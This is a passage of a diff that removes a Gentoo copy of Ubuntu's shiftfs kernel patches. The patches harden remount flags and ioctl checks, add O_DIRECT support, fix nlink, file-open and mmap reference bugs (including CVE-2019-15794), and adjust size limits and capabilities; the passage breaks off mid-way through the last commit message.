-2.39.2
-
-From 10c6312a5c1cd2fbbbcb47adf7597e8cb2e18391 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Wed, 8 May 2019 14:13:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: lock down certain superblock flags
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1827122
-
-This locks down various superblock flags to prevent userns-root from
-remounting a superblock with less restrictive options than the original
-mark or underlay mount.
-
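-Condensed from the diff below, a remount may never clear a restrictive
-flag that the existing superblock has, for example:
-
- if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
-  return -EPERM;
-
- if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
-  return -EPERM;
-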
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 47 ++++++++++++++++++++++++++++++++++++++++++++++-
- 1 file changed, 46 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9771165d1ce0..a1dae7ea593b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1808,6 +1808,33 @@ static inline bool passthrough_is_subset(int old_flags, int new_flags)
- 	return true;
- }
- 
-+static int shiftfs_super_check_flags(unsigned long old_flags,
-+				     unsigned long new_flags)
-+{
-+	if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
-+		return -EPERM;
-+
-+	if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
-+		return -EPERM;
-+
-+	if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
-+		return -EPERM;
-+
-+	return 0;
-+}
-+
- static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- {
- 	int err;
-@@ -1818,6 +1845,10 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 	if (err)
- 		return err;
- 
-+	err = shiftfs_super_check_flags(sb->s_flags, *flags);
-+	if (err)
-+		return err;
-+
- 	/* Mark mount option cannot be changed. */
- 	if (info->mark || (info->mark != new.mark))
- 		return -EPERM;
-@@ -1847,6 +1878,16 @@ struct shiftfs_data {
- 	const char *path;
- };
- 
-+static void shiftfs_super_force_flags(struct super_block *sb,
-+				      unsigned long lower_flags)
-+{
-+	sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
-+				      SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
-+
-+	if (!(lower_flags & SB_POSIXACL))
-+		sb->s_flags &= ~SB_POSIXACL;
-+}
-+
- static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			      int silent)
- {
-@@ -1888,6 +1929,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	sb->s_flags |= SB_POSIXACL;
-+
- 	if (sbinfo->mark) {
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
-@@ -1904,6 +1947,8 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
- 
-+		shiftfs_super_force_flags(sb, lower_sb->s_flags);
-+
- 		/*
- 		 * Handle nesting of shiftfs mounts by referring this mark
- 		 * mount back to the original mark mount. This is more
-@@ -1972,6 +2017,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		 * passthrough settings.
- 		 */
- 		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
-+		shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-@@ -1995,7 +2041,6 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_flags |= SB_POSIXACL;
- 	sb->s_root = d_make_root(inode);
- 	if (!sb->s_root) {
- 		err = -ENOMEM;
--- 
-2.39.2
-
-From 650ec55632c03c03e6cc5b08a764609b4b0eb192 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 11 Jun 2019 11:47:35 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: allow changing ro/rw for subvolumes
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1832316
-
-This enables toggling between ro/rw for btrfs subvolumes under shiftfs.
-
-Currently, btrfs workloads employing shiftfs regress.
-With btrfs, unprivileged users can already toggle whether a subvolume
-will be ro or rw. This is broken on current shiftfs as we haven't
-whitelisted these ioctl()s.
-To prevent such regression, we need to whitelist the ioctls
-BTRFS_IOC_FS_INFO, BTRFS_IOC_SUBVOL_GETFLAGS, and
-BTRFS_IOC_SUBVOL_SETFLAGS. All of them should be safe for unprivileged
-users.
-
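-Condensed from the diff below, BTRFS_IOC_SUBVOL_SETFLAGS is only let
-through after verifying that nothing beyond the read-only bit changes
-(a later patch in this series switches arg to the void __user pointer
-argp):
-
- case BTRFS_IOC_SUBVOL_SETFLAGS:
-  if (copy_from_user(&flags, arg, sizeof(flags)))
-   return false;
-
-  if (flags & ~BTRFS_SUBVOL_RDONLY)
-   return false;
-
-  return true;
-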
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Cc: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 21 ++++++++++++++++++---
- 1 file changed, 18 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a1dae7ea593b..49f6714e9f95 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	return ret;
- }
- 
--static bool in_ioctl_whitelist(int flag)
-+static bool in_ioctl_whitelist(int flag, unsigned long arg)
- {
-+	void __user *argp = (void __user *)arg;
-+	u64 flags = 0;
-+
- 	switch (flag) {
-+	case BTRFS_IOC_FS_INFO:
-+		return true;
- 	case BTRFS_IOC_SNAP_CREATE:
- 		return true;
- 	case BTRFS_IOC_SNAP_CREATE_V2:
-@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
- 	case BTRFS_IOC_SUBVOL_CREATE:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_GETFLAGS:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_SETFLAGS:
-+		if (copy_from_user(&flags, arg, sizeof(flags)))
-+			return false;
-+
-+		if (flags & ~BTRFS_SUBVOL_RDONLY)
-+			return false;
-+
- 		return true;
- 	case BTRFS_IOC_SNAP_DESTROY:
- 		return true;
-@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOTTY;
- 	}
-@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOIOCTLCMD;
- 	}
--- 
-2.39.2
-
-From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:46 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837223
-
-This enables O_DIRECT support for shiftfs if the underlay supports it.
-
-Currently shiftfs does not handle O_DIRECT if the underlay supports it.
-This is blocking dqlite - an essential part of LXD - from profiting from
-the performance benefits of O_DIRECT on suitable filesystems when used
-with async io such as aio or io_uring.
-Overlayfs cannot support this directly since the upper filesystem in
-overlay can be any filesystem. So if the upper filesystem does not
-support O_DIRECT but the lower filesystem does you're out of luck.
-Shiftfs does not suffer from the same problem since there is no concept
-of an upper filesystem in the same way that overlayfs has it.
-Essentially, shiftfs is a transparent shim relaying everything to the
-underlay while overlayfs' upper layer is not (completely).
-
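-For illustration, an open that this makes work (a sketch; the path is
-made up and the underlay must support O_DIRECT):
-
- int fd = open("/mnt/shiftfs/db.raw", O_RDWR | O_DIRECT);
-
-This succeeds because dentry_open() checks f_mapping->a_ops->direct_IO
-and shiftfs now points f_mapping at the underlay's mapping.
-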
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 49f6714e9f95..addaa6e21e57 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
- 	}
- 
- 	file->private_data = file_info;
-+	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
-+	file->f_mapping = realfile->f_mapping;
-+
- 	file_info->realfile = realfile;
- 	return 0;
- }
--- 
-2.39.2
-
-From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:47 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct pointer down
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837231
-
-This used to pass an unsigned long to copy_from_user() instead of a
-void __user * pointer. This will produce a warning with a sufficiently
-advanced compiler.
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index addaa6e21e57..9006201c243d 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
- 	case BTRFS_IOC_SUBVOL_GETFLAGS:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_SETFLAGS:
--		if (copy_from_user(&flags, arg, sizeof(flags)))
-+		if (copy_from_user(&flags, argp, sizeof(flags)))
- 			return false;
- 
- 		if (flags & ~BTRFS_SUBVOL_RDONLY)
--- 
-2.39.2
-
-From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Thu, 29 Aug 2019 20:45:07 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1841977
-
-The way we messed with setting i_nlink was brittle and wrong. We used to
-set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
-of the underlay dentry of the directory it resided in, which makes no
-sense whatsoever. We also missed drop_nlink(), which is crucial since
-i_nlink affects whether a dentry is cleaned up on dput().
-With this I cannot reproduce the bug anymore where shiftfs misleads zfs
-into believing that a deleted file can not be removed from disk because
-it is still referenced.
-
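-Condensed from the diff below, the nlink bookkeeping on a successful
-removal now operates on the shiftfs inode itself:
-
- if (!err) {
-  d_drop(dentry);
-
-  if (rmdir)
-   clear_nlink(inode);
-  else
-   drop_nlink(inode);
- }
-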
-Fixes: commit 87011da41961 ("shiftfs: rework and extend")
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 ++++++++++-----
- 1 file changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9006201c243d..e80db9480b5c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
-+	struct inode *inode = d_inode(dentry);
- 	int err;
- 	const struct cred *oldcred;
- 
-@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 		err = vfs_rmdir(loweri, lowerd);
- 	else
- 		err = vfs_unlink(loweri, lowerd, NULL);
--	inode_unlock(loweri);
- 	revert_creds(oldcred);
- 
--	shiftfs_copyattr(loweri, dir);
--	set_nlink(d_inode(dentry), loweri->i_nlink);
--	if (!err)
-+	if (!err) {
- 		d_drop(dentry);
- 
--	set_nlink(dir, loweri->i_nlink);
-+		if (rmdir)
-+			clear_nlink(inode);
-+		else
-+			drop_nlink(inode);
-+	}
-+	inode_unlock(loweri);
-+
-+	shiftfs_copyattr(loweri, dir);
- 
- 	return err;
- }
--- 
-2.39.2
-
-From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 30 Aug 2019 14:14:31 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
- SLAB_RECLAIM_ACCOUNT
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1842059
-
-Shiftfs does not mark its slab cache as reclaimable. While this is not
-a big deal, it is not nice to the kernel in general. The shiftfs cache is
-not so important that it can't be reclaimed.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e80db9480b5c..a21cb473e000 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
- {
- 	shiftfs_file_info_cache = kmem_cache_create(
- 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
- 	if (!shiftfs_file_info_cache)
- 		return -ENOMEM;
- 
--- 
-2.39.2
-
-From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 2 Oct 2019 09:57:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1846265
-
-This commit simplifies how shiftfs opens files, both regular files and
-directories.
-
-In the first iteration, we implemented a kmem cache for struct
-shiftfs_file_info which stashed away a struct path and the struct file
-for the underlay. The path however was never used anywhere so the struct
-shiftfs_file_info and therefore the whole kmem cache can go away.
-Instead we move to the same model as overlayfs and just stash away the
-struct file for the underlay in file->private_data of the shiftfs struct
-file.
-Additionally, we split the .open method for files and directories.
-Similar to overlayfs, .open for regular files uses open_with_fake_path()
-which ensures that it doesn't contribute to the open file count (since
-this would mean we'd count double). The .open method for directories
-however used dentry_open() which contributes to the open file count.
-
-The basic logic for opening files is unchanged. The main point is to
-ensure that a reference to the underlay's dentry is kept through struct
-path.
-
-Various bits and pieces of this were cooked up in discussions Seth and I
-had in Paris.
-
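-Condensed from the diff below: regular files stash the underlay file
-directly in file->private_data and open it via
-
- realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
-                                info->creator_cred);
-
-so they do not contribute to the open file count, while directories use
-
- realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
-                        info->creator_cred);
-
-which does count.
-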
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
- 1 file changed, 47 insertions(+), 58 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21cb473e000..55bb32b611f2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -31,13 +31,6 @@ struct shiftfs_super_info {
- 	unsigned int passthrough_mark;
- };
- 
--struct shiftfs_file_info {
--	struct path realpath;
--	struct file *realfile;
--};
--
--struct kmem_cache *shiftfs_file_info_cache;
--
- static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 			       umode_t mode, dev_t dev, struct dentry *dentry);
- 
-@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
- };
- 
- static struct file *shiftfs_open_realfile(const struct file *file,
--					  struct path *realpath)
-+					  struct inode *realinode)
- {
--	struct file *lowerf;
--	const struct cred *oldcred;
-+	struct file *realfile;
-+	const struct cred *old_cred;
- 	struct inode *inode = file_inode(file);
--	struct inode *loweri = realpath->dentry->d_inode;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
- 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
- 
--	oldcred = shiftfs_override_creds(inode->i_sb);
--	/* XXX: open_with_fake_path() not gauranteed to stay around, if
--	 * removed use dentry_open() */
--	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
--	revert_creds(oldcred);
-+	old_cred = shiftfs_override_creds(inode->i_sb);
-+	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
-+				       info->creator_cred);
-+	revert_creds(old_cred);
- 
--	return lowerf;
-+	return realfile;
- }
- 
- #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	lowerfd->flags = 0;
- 	lowerfd->file = realfile;
-@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- 
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
--	struct shiftfs_file_info *file_info;
- 	struct file *realfile;
--	struct path *realpath;
- 
--	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
--	if (!file_info)
--		return -ENOMEM;
--
--	realpath = &file_info->realpath;
--	realpath->mnt = ssi->mnt;
--	realpath->dentry = file->f_path.dentry->d_fsdata;
--
--	realfile = shiftfs_open_realfile(file, realpath);
--	if (IS_ERR(realfile)) {
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	realfile = shiftfs_open_realfile(file, inode->i_private);
-+	if (IS_ERR(realfile))
- 		return PTR_ERR(realfile);
--	}
- 
--	file->private_data = file_info;
-+	file->private_data = realfile;
- 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
- 	file->f_mapping = realfile->f_mapping;
- 
--	file_info->realfile = realfile;
- 	return 0;
- }
- 
--static int shiftfs_release(struct inode *inode, struct file *file)
-+static int shiftfs_dir_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
-+			       info->creator_cred);
-+	revert_creds(oldcred);
-+	if (IS_ERR(realfile))
-+		return PTR_ERR(realfile);
- 
--	if (file_info) {
--		if (file_info->realfile)
--			fput(file_info->realfile);
-+	file->private_data = realfile;
- 
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
--	}
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct file *realfile = file->private_data;
-+
-+	if (realfile)
-+		fput(realfile);
- 
- 	return 0;
- }
- 
-+static int shiftfs_dir_release(struct inode *inode, struct file *file)
-+{
-+	return shiftfs_release(inode, file);
-+}
-+
- static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	return vfs_llseek(realfile, offset, whence);
- }
-@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
- 
- static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 	const struct cred *oldcred;
- 	int ret;
- 
-@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- {
- 	const struct cred *oldcred;
- 	int err = -ENOTDIR;
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
- 	err = iterate_dir(realfile, ctx);
-@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
- };
- 
- const struct file_operations shiftfs_dir_operations = {
-+	.open			= shiftfs_dir_open,
-+	.release		= shiftfs_dir_release,
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
- 	.llseek			= shiftfs_dir_llseek,
--	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
--	.release		= shiftfs_release,
- 	.unlocked_ioctl		= shiftfs_ioctl,
- };
- 
-@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
--	shiftfs_file_info_cache = kmem_cache_create(
--		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
--	if (!shiftfs_file_info_cache)
--		return -ENOMEM;
--
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
--	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
--- 
-2.39.2
-
-From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Wed, 6 Nov 2019 09:38:57 -0600
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
- mmap fails
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850994
-
-shiftfs_mmap() overwrites vma->vm_file before calling the lower
-filesystem mmap but does not restore the original value on
-failure. This means it is giving a pointer to the lower fs file
-back to the caller with no reference, which is a bad practice.
-However, it does not lead to any issues with upstream kernels as
-no caller accesses vma->vm_file after call_mmap().
-
-With the aufs patches applied the story is different. Whereas
-mmap_region() previously fput a local variable containing the
-file it assigned to vm_file, it now calls vma_fput() which will
-fput vm_file, for which it has no reference, and the reference
-for the original vm_file is not put.
-
-Fix this by restoring vma->vm_file to the original value when the
-mmap call into the lower fs fails.
-
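-Condensed from the diff below, the error path now drops the new value's
-reference and restores the old one:
-
- if (ret) {
-  /* Drop refcount from new vm_file value and restore original
-   * vm_file value */
-  vma->vm_file = file;
-  fput(realfile);
- } else {
-  /* Drop refcount from previous vm_file value */
-  fput(file);
- }
-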
-CVE-2019-15794
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 +++++++++++----
- 1 file changed, 11 insertions(+), 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 55bb32b611f2..57d84479026b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- 
- 	shiftfs_file_accessed(file);
- 
--	if (ret)
--		fput(realfile); /* Drop refcount from new vm_file value */
--	else
--		fput(file); /* Drop refcount from previous vm_file value */
-+	if (ret) {
-+		/*
-+		 * Drop refcount from new vm_file value and restore original
-+		 * vm_file value
-+		 */
-+		vma->vm_file = file;
-+		fput(realfile);
-+	} else {
-+		/* Drop refcount from previous vm_file value */
-+		fput(file);
-+	}
- 
- 	return ret;
- }
--- 
-2.39.2
-
-From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:22:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849482
-
-Set the s_maxbytes limit to MAX_LFS_FILESIZE.
-Currently shiftfs limits the maximum size for fallocate() needlessly
-causing calls such as fallocate --length 2GB ./file to fail. This
-limitation is arbitrary since it's not caused by the underlay but
-rather by shiftfs itself capping the s_maxbytes. This causes bugs such
-as the one reported in [1].
-
-[1]: https://github.com/lxc/lxd/issues/6333
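-
-For illustration, an allocation that used to fail and now succeeds (a
-sketch; fd is any regular file opened for writing on a shiftfs mount):
-
- /* Equivalent of: fallocate --length 2GB ./file */
- fallocate(fd, 0, 0, 2ULL * 1024 * 1024 * 1024);
-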
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 57d84479026b..6a2b5e3d0d53 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	inode->i_private = dentry->d_inode;
- 
- 	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_maxbytes = MAX_LFS_FILESIZE;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--- 
-2.39.2
-
-From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:23:50 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
- capabilities
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849483
-
-Currently shiftfs allows to exceed project quota and reserved space on
-e.g. ext2. See [1] and especially [2] for a bug report. This is very
-much not what we want. Quotas and reserved space settings set on the
-host need to be respected. The cause for this issue is overriding the
-credentials with the superblock creator's credentials whenever we
-perform operations such as fallocate() or writes while retaining
-CAP_SYS_RESOURCE.
-
-The fix is to drop CAP_SYS_RESOURCE from the effective capability set
-after we have made a copy of the superblock creator's credential at
-superblock creation time. This very likely gives us more security than
-we had before and the regression potential seems limited. I would like
-to try this approach first before coming up with something potentially
-more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
-limiting factor in most use-cases.
-
-[1]: https://github.com/lxc/lxd/issues/6333
-[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
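-
-Condensed from the diff below, the creator credential is now prepared
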